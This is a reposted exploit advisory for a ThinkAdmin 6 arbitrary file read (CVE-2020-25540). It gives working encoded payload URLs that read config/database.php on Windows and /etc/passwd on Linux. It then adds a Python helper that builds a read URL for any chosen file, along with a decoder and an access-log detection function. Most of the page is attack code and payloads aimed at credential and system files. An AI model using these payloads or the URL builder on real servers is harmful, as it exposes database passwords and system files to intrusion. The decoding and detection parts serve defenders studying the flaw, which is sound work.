ThinkAdmin 6 - Arbitrary File Read - Hack之路

ThinkAdmin 6 - Arbitrary File Read

# Exploit Author: Hzllaga

# Vendor Homepage: https://github.com/zoujingli/ThinkAdmin/

# Software Link: https://github.com/zoujingli/ThinkAdmin/commit/ff2ab47cfabd4784efffbf72a2a386c5d5c43a9a

# Version: v6 <= 2020.08.03.01

# Tested on: PHP 7.4.7, Apache

# CVE: CVE-2020-25540

PoC:

The vulnerable endpoint is admin/api.Update/get/encode/<path>, where <path> is the target file path with every byte written as two lowercase base-36 digits (for example "/" becomes 1b and "." becomes 1a). The decoded path is not confined to the web root, so "../" segments walk out of it and any file the PHP process can read is returned.

On Windows, read config/database.php. The payload decodes to public/static/../../config/database"php; on Windows a double quote in a file name is treated as a DOS wildcard that matches a dot, so the name resolves to database.php:
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34

On Linux, read /etc/passwd. The payload decodes to public/static/ followed by a run of "../" and then etc/passwd:
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s
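The two payloads above are nothing more than the target path run through a per-byte base-36 encoding. The Python helper below is an added example (not code from the advisory or from the ThinkAdmin project): it encodes and decodes that scheme, which is inferred from the page's two payloads (both round-trip under it), builds the PoC URL for an arbitrary file, and, for the defensive side, decodes requests to the endpoint from access-log lines and flags any whose decoded path traverses directories or carries Windows wildcard characters. The host name, the endpoint prefix `public/static/` taken from the payloads, and the sample log lines are constructed placeholders.

```python
"""Encoder/decoder and detection helper for the ThinkAdmin 6 file-read
endpoint admin/api.Update/get/encode/<path> (CVE-2020-25540).

Added example; not the advisory's or ThinkAdmin's own code. The encoding
(each byte of the path as two lowercase base-36 digits) is inferred from the
two payloads in the advisory, both of which round-trip under it.
"""
import re
import string

B36 = string.digits + string.ascii_lowercase          # base-36 digit alphabet
ENDPOINT = "/admin.html?s=admin/api.Update/get/encode/"

# The two payloads from the advisory, copied verbatim.
WINDOWS_PAYLOAD = "34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34"
LINUX_PAYLOAD = "34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s"


def encode_path(path: str) -> str:
    """Write each UTF-8 byte as two base-36 digits, zero-padded ('/' -> '1b')."""
    return "".join(B36[b // 36] + B36[b % 36] for b in path.encode("utf-8"))


def decode_path(encoded: str) -> str:
    """Inverse of encode_path. Rejects odd length, non-base-36 digits and
    pairs above 0xff rather than silently producing garbage."""
    if len(encoded) % 2 or any(c not in B36 for c in encoded):
        raise ValueError("malformed encoded path")
    vals = [int(encoded[i:i + 2], 36) for i in range(0, len(encoded), 2)]
    if any(v > 0xFF for v in vals):
        raise ValueError("base-36 pair exceeds one byte")
    return bytes(vals).decode("utf-8", errors="replace")


def build_poc_url(base: str, target: str, depth: int = 2) -> str:
    """Build a read URL for `target`, climbing `depth` levels from public/static/
    (the prefix the advisory's payloads use; two levels reaches the directory
    that holds config/, as the database.php payload shows). `base` is a
    placeholder such as http://target.example."""
    rel = "public/static/" + "../" * depth + target.lstrip("/")
    return base.rstrip("/") + ENDPOINT + encode_path(rel)


_ENCODED_RE = re.compile(r"api\.Update/get/encode/([0-9A-Za-z]+)")


def flag_request(request_line: str):
    """Detection helper for access logs. Returns None when the line does not
    hit the endpoint, otherwise (decoded_path, suspicious). A path is suspicious
    if it contains '..', is absolute, or carries the Windows DOS wildcard
    characters '<', '>' or '"' (the Windows payload uses '"' in place of '.')."""
    m = _ENCODED_RE.search(request_line)
    if not m:
        return None
    try:
        decoded = decode_path(m.group(1).lower())
    except ValueError:
        return ("<undecodable>", True)
    suspicious = (".." in decoded or decoded.startswith("/")
                  or any(c in decoded for c in '<>"'))
    return (decoded, suspicious)


# Constructed sample request lines (not taken from any real server log).
SAMPLE_LOG = [
    "GET " + ENDPOINT + WINDOWS_PAYLOAD + " HTTP/1.1",
    "GET " + ENDPOINT + encode_path("public/static/admin/style.css") + " HTTP/1.1",
    "GET /admin.html?s=admin/index/index HTTP/1.1",
]

if __name__ == "__main__":
    print(decode_path(WINDOWS_PAYLOAD))
    print(decode_path(LINUX_PAYLOAD))
    print(build_poc_url("http://target.example", "config/database.php"))
    for line in SAMPLE_LOG:
        print(flag_request(line), line)
```

Decoding the advisory's own payloads is the quickest way to confirm what a captured request was after; the detection function deliberately treats undecodable values as suspicious, since a legitimate client never sends anything the endpoint cannot decode.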

Site: https://www.hackzl.cn; published by hack之路. Please credit the source when reposting: https://www.hackzl.cn/index.php/2020/09/21/thinkadmin-6-%e4%bb%bb%e6%84%8f%e6%96%87%e4%bb%b6%e8%af%bb%e5%8f%96-hack%e4%b9%8b%e8%b7%af/
